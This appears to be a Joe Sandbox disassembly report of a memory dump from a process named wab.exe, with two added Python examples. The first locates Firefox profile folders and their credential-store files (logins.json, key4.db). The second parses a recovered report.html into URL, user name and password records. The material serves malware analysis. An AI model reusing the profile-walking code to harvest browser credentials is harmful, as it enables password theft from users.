• ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
• memset.MSVCRT ref: 004133C0
• GetCurrentProcessId.KERNEL32 ref: 004133CE
• memcpy.MSVCRT ref: 004133FC
• wcscpy.MSVCRT ref: 0041341F
• _snwprintf.MSVCRT ref: 0041348E
• SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
• GetDlgItem.USER32(?,000003EA), ref: 004134B0
• SetFocus.USER32(00000000), ref: 004134B7
Strings
• Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
• {Unknown}, xrefs: 004132A6
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
• String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
• API String ID: 4111938811-1819279800
Uniqueness Score: -1.00%

APIs
• GetDlgItem.USER32(?,000003EC), ref: 004011F0
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
• GetDlgItem.USER32(?,000003EE), ref: 00401238
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
• GetDlgItem.USER32(?,000003EC), ref: 00401273
• ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
• GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
• LoadCursorW.USER32(00000000,00000067), ref: 00401297
• SetCursor.USER32(00000000,?,?), ref: 0040129E
• GetDlgItem.USER32(?,000003EE), ref: 004012BF
• ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
• GetDlgItem.USER32(?,000003EC), ref: 004012E6
• SetBkMode.GDI32(?,00000001), ref: 004012F2
• SetTextColor.GDI32(?,00C00000), ref: 00401300
• GetSysColorBrush.USER32(0000000F), ref: 00401308
• GetDlgItem.USER32(?,000003EE), ref: 00401329
• EndDialog.USER32(?,?), ref: 0040135E
• DeleteObject.GDI32(?), ref: 0040136A
• GetDlgItem.USER32(?,000003ED), ref: 0040138F
• ShowWindow.USER32(00000000), ref: 00401398
• GetDlgItem.USER32(?,000003EE), ref: 004013A4
• ShowWindow.USER32(00000000), ref: 004013A7
• SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                              • String ID:
                                                                                              • API String ID: 829165378-0
                                                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                              • memset.MSVCRT ref: 00404200
                                                                                              • memset.MSVCRT ref: 00404215
                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                              • API String ID: 2454223109-1580313836
                                                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
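The string set `General`, `IsRelative`, `Path`, `Profile%d` and `profiles.ini` in the function at 00404172, together with its `_snwprintf` and `GetFileAttributesW` calls, matches the layout of Firefox's profiles.ini: a `[General]` section followed by `[Profile0]`, `[Profile1]`, ... sections whose `Path` is relative to the profiles.ini directory when `IsRelative=1`. The Python below is an added example, not code from the sample or from Joe Sandbox; it walks such a file the way the strings suggest, probing `Profile%d` sections by index. The profiles.ini content is constructed, and the credential-store file names are known Firefox names that do not appear on this page.

```python
"""Walk a Firefox profiles.ini the way the stealer's string set implies.

Added example, not code from the sample or from Joe Sandbox.  The sections
[General], [Profile0], [Profile1], ... with IsRelative= and Path= keys are the
documented Firefox profiles.ini layout; the file content below is constructed.
"""
import configparser
from pathlib import PureWindowsPath

# Constructed profiles.ini: one relative and one absolute profile path.
SAMPLE_PROFILES_INI = """\
[General]
StartWithLastProfile=1
Version=2

[Profile0]
Name=default
IsRelative=1
Path=Profiles/abcd1234.default
Default=1

[Profile1]
Name=work
IsRelative=0
Path=D:\\FirefoxProfiles\\work
"""

# Assumption (known Firefox file names, not shown on this page): the files a
# password harvester reads once it has located a profile directory.
CREDENTIAL_FILES = ("logins.json", "key4.db", "signons.sqlite", "key3.db")


def enumerate_profiles(ini_text, firefox_dir):
    """Return [(name, profile_dir)] for Profile0, Profile1, ... until a gap.

    firefox_dir is the directory holding profiles.ini (normally
    %APPDATA%\\Mozilla\\Firefox); relative Path values resolve against it.
    Probing "Profile%d" by index until a section is missing is the loop the
    _snwprintf("Profile%d") call in the dumped function suggests.
    """
    cfg = configparser.ConfigParser(interpolation=None)
    cfg.read_string(ini_text)
    base = PureWindowsPath(firefox_dir)
    profiles = []
    index = 0
    while True:
        key = "Profile%d" % index
        if not cfg.has_section(key):
            break
        section = cfg[key]
        index += 1
        path = section.get("Path", "").strip()
        if not path:
            continue  # malformed section: no directory to look in
        if section.get("IsRelative", "1").strip() == "1":
            profile_dir = base / path  # forward slashes are normalised
        else:
            profile_dir = PureWindowsPath(path)
        profiles.append((section.get("Name", key), str(profile_dir)))
    return profiles


def credential_files(profile_dir):
    """Candidate credential-store paths inside one profile directory."""
    base = PureWindowsPath(profile_dir)
    return [str(base / name) for name in CREDENTIAL_FILES]


if __name__ == "__main__":
    firefox_dir = r"C:\Users\u\AppData\Roaming\Mozilla\Firefox"
    for name, directory in enumerate_profiles(SAMPLE_PROFILES_INI, firefox_dir):
        print(name, directory)
        for path in credential_files(directory):
            print("   ", path)
```

Stopping at the first missing `Profile%d` index mirrors a harvester that loops on `GetPrivateProfileStringW` until a section is absent; when triaging a dump, the presence of exactly this probing pattern next to `profiles.ini` is what distinguishes a Firefox credential grabber from generic INI handling.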

                                                                                              APIs
                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                              • memcpy.MSVCRT ref: 004115C8
                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                              • API String ID: 4054529287-3175352466
                                                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                              • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                              • API String ID: 3143752011-1996832678
                                                                                              • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                              • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                              • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                              • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$HandleModule
                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                              • API String ID: 667068680-2887671607
                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                              • API String ID: 1607361635-601624466
                                                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                              • API String ID: 2000436516-3842416460
                                                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%
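The three HTML-building functions above (`<table border="1" cellpadding="5">`, `<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s`, `<th%s>%s%s%s`, `</table><p>`, `&nbsp;`) emit table markup in which `<td>` and `<th>` cells are never closed, and the `report.html` string next to the `GetTempPathW` call shows where that output is written. If such a report is recovered from disk or from process memory, a parser that expects `</td>` will not do. The Python below is an added example, not code from the sample or from Joe Sandbox; the report text is constructed from those format strings, and the shape of the data rows under a `<th>` header row is an assumption.

```python
"""Parse the stealer's report.html table markup back into records.

Added example, not code from the sample or from Joe Sandbox.  Modelled on
the dumped format strings (<table border="1" cellpadding="5">,
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s, <th%s>%s%s%s, </table><p>,
&nbsp;).  The report text is constructed; the data-row shape under a <th>
header row is an assumption.
"""
from html.parser import HTMLParser

SAMPLE_REPORT = (
    # column-header layout: one <th> per field, then one row per item
    '<table border="1" cellpadding="5"><tr bgcolor="#E0E0E0">'
    '<th width="30%"><font color="#000080">URL</font>'
    '<th><font color="#000080">User Name</font>'
    '<th><font color="#000080">Password</font>'
    '<tr><td nowrap>https://mail.example.test<td>alice@example.test<td>hunter2'
    '<tr><td nowrap>https://shop.example.test<td>bob<td>&nbsp;'
    '</table><p>'
    # vertical layout: one <td>label<td>value row per field of a single item
    '<table border="1" cellpadding="5">'
    '<tr><td bgcolor="#F0F0F0" nowrap><b>URL</b><td bgcolor=#FFFFFF nowrap>https://vpn.example.test'
    '<tr><td bgcolor="#F0F0F0" nowrap><b>User Name</b><td bgcolor=#FFFFFF>carol'
    '<tr><td bgcolor="#F0F0F0" nowrap><b>Password</b><td bgcolor=#FFFFFF>s3cret'
    '</table><p>'
)


class ReportTableParser(HTMLParser):
    """Collect tables as lists of rows; each row is a list of (tag, text).

    A new <tr>, <td> or <th> implicitly closes the open cell or row, which
    is how browsers treat this markup and what the unclosed-tag format
    strings rely on.  Inline <b>/<font> tags are ignored; &nbsp; becomes ''.
    """

    def __init__(self):
        super().__init__()
        self.tables = []
        self._table = None
        self._row = None
        self._cell = None
        self._cell_tag = None

    def _end_cell(self):
        if self._cell is not None:
            self._row.append((self._cell_tag, "".join(self._cell).strip()))
            self._cell = None

    def _end_row(self):
        self._end_cell()
        if self._row is not None:
            self._table.append(self._row)
            self._row = None

    def handle_starttag(self, tag, attrs):
        if tag == "table":
            self._table = []
        elif tag == "tr" and self._table is not None:
            self._end_row()
            self._row = []
        elif tag in ("td", "th") and self._row is not None:
            self._end_cell()
            self._cell, self._cell_tag = [], tag

    def handle_endtag(self, tag):
        if tag == "table" and self._table is not None:
            self._end_row()
            self.tables.append(self._table)
            self._table = None
        elif tag == "tr":
            self._end_row()
        elif tag in ("td", "th"):
            self._end_cell()

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)


def records_from_report(html):
    """Turn every table into dicts, handling both layouts seen in the strings."""
    parser = ReportTableParser()
    parser.feed(html)
    parser.close()
    records = []
    for rows in parser.tables:
        if not rows:
            continue
        if all(tag == "th" for tag, _ in rows[0]):
            header = [text for _, text in rows[0]]
            for row in rows[1:]:
                records.append(dict(zip(header, (text for _, text in row))))
        else:
            records.append({row[0][1]: row[1][1] for row in rows if len(row) == 2})
    return records


if __name__ == "__main__":
    for record in records_from_report(SAMPLE_REPORT):
        print(record)
```

Because the parser keys on structure rather than on any particular field name, it works unchanged on whichever set of columns the harvester chose to emit; an analyst who recovers a fragment of `report.html` from the `wab.exe` memory dump can feed it in as-is to see what the tool had collected before exfiltration.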

                                                                                              APIs
                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                              • String ID:
                                                                                              • API String ID: 1043902810-0
                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
  • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
• ??3@YAXPAX@Z.MSVCRT ref: 0040E49A
  • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
• memset.MSVCRT ref: 0040E380
  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
  • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
• wcschr.MSVCRT ref: 0040E3B8
• memcpy.MSVCRT ref: 0040E3EC
• memcpy.MSVCRT ref: 0040E407
• memcpy.MSVCRT ref: 0040E422
• memcpy.MSVCRT ref: 0040E43D
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: memcpy$_wcsicmpmemset$??3@wcschrwcslen
• String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
• API String ID: 3073804840-2252543386
• Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
• Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
• Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
• Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: ??2@??3@_snwprintfwcscpy
• String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
• API String ID: 2899246560-1542517562
• Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
• Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
• Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
• Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
Uniqueness Score: -1.00%

APIs
• memset.MSVCRT ref: 0040DBCD
• memset.MSVCRT ref: 0040DBE9
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
  • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
  • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
  • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
• wcscpy.MSVCRT ref: 0040DC2D
• wcscpy.MSVCRT ref: 0040DC3C
• wcscpy.MSVCRT ref: 0040DC4C
• EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
• EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
• wcscpy.MSVCRT ref: 0040DCC3
Memory Dump Source
• Source File: 0000000C.00000002.2437979327.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_400000_wab.jbxd
Similarity
• API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
• String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
• API String ID: 3330709923-517860148
• Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
• Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
• Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
• Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
  • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
  • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
• memset.MSVCRT ref: 0040806A
• memset.MSVCRT ref: 0040807F
• _wtoi.MSVCRT ref: 004081AF
• _wcsicmp.MSVCRT ref: 004081C3
• memset.MSVCRT ref: 004081E4
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
  • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
• WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
